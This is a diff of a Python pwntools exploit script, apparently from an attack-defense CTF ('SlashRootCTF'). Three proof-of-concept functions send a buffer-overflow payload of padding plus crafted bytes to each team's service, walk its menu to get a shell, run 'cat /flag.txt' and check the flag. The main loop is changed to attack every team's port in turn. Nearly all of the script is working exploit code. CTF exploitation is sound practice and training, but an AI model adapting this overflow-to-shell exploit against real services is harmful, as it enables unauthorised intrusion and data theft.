|
@ -2,7 +2,7 @@ |
|
|
from pwn import process, remote |
|
|
from pwn import process, remote |
|
|
|
|
|
|
|
|
HOST = "192.168.2.20" |
|
|
HOST = "192.168.2.20" |
|
|
TOTAL_TEAMS = 10 |
|
|
|
|
|
|
|
|
TOTAL_TEAMS = 1 |
|
|
FORMAT = "SlashRootCTF" |
|
|
FORMAT = "SlashRootCTF" |
|
|
|
|
|
|
|
|
|
|
|
|
|
@ -15,7 +15,9 @@ def poc0(host, port): |
|
|
p = remote(host, port) |
|
|
p = remote(host, port) |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
if "young" in p.recvuntil(">"): |
|
|
|
|
|
|
|
|
msg = p.recvuntil(">") |
|
|
|
|
|
# print(msg) |
|
|
|
|
|
if "young" in msg: |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("2") |
|
|
p.sendline("2") |
|
@ -27,7 +29,8 @@ def poc0(host, port): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recv(46) |
|
|
|
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
# print flag |
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
|
else: |
|
|
else: |
|
@ -60,7 +63,7 @@ def poc1(host, port): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recv(46) |
|
|
|
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
|
else: |
|
|
else: |
|
@ -85,7 +88,7 @@ def poc2(host, port): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recv(46) |
|
|
|
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
|
else: |
|
|
else: |
|
@ -95,7 +98,7 @@ def poc2(host, port): |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if __name__ == "__main__": |
|
|
if __name__ == "__main__": |
|
|
for i in range(1): |
|
|
|
|
|
|
|
|
for i in range(1, TOTAL_TEAMS+1): |
|
|
print poc0(HOST, (60004 + (i*100))) |
|
|
print poc0(HOST, (60004 + (i*100))) |
|
|
print poc1(HOST, (60004 + (i*100))) |
|
|
print poc1(HOST, (60004 + (i*100))) |
|
|
print poc2(HOST, (60004 + (i*100))) |
|
|
print poc2(HOST, (60004 + (i*100))) |